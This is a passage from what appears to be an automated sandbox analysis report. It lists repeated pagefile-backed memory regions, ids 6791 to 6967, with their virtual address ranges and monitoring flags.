0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6791 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6792 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6793 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6794 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6795 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6796 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6797 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6798 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6799 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6800 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6801 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6802 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6803 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6804 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6805 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6806 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6807 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6808 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6809 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6810 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6811 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6812 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6813 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6814 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6815 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6816 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6817 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6818 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6819 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6820 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6821 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6822 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6823 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6824 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6825 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6826 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6827 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6828 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6829 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6830 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6831 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6832 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6833 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6834 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6835 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6836 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6837 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6838 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6839 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6840 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6841 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6842 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6843 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6844 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6845 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6846 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6847 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6848 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6849 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6850 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6851 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6852 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6853 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6854 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6855 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6856 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6857 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6858 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6859 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6860 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6861 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6862 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6863 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6864 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6865 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6866 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6867 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6868 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6869 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6870 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6871 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6872 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6873 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6874 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6875 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6876 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6877 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6878 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6879 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6880 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6881 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6882 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6883 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6884 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6885 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6886 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6887 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6888 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6889 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6890 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6891 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6892 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6893 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6894 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6895 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6896 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6897 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6898 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6899 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6900 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6901 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6902 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6903 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6904 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6905 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6906 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6907 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6908 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6909 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6910 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6911 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6912 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6913 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6914 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6915 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6916 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6917 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6918 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6919 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6920 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6921 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6922 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6923 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6924 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6925 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6926 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6927 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6928 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6929 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6930 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6931 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6932 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6933 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6934 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6935 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6936 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6937 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6938 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6939 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6940 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6941 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6942 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6943 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6944 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6945 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6946 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6947 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6948 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6949 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6950 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6951 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6952 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6953 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6954 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6955 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6956 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6957 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6958 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6959 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6960 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6961 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6962 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6963 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6964 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6965 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6966 start_va = 0x44f0000 end_va = 0x4506fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6967 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6968 start_va = 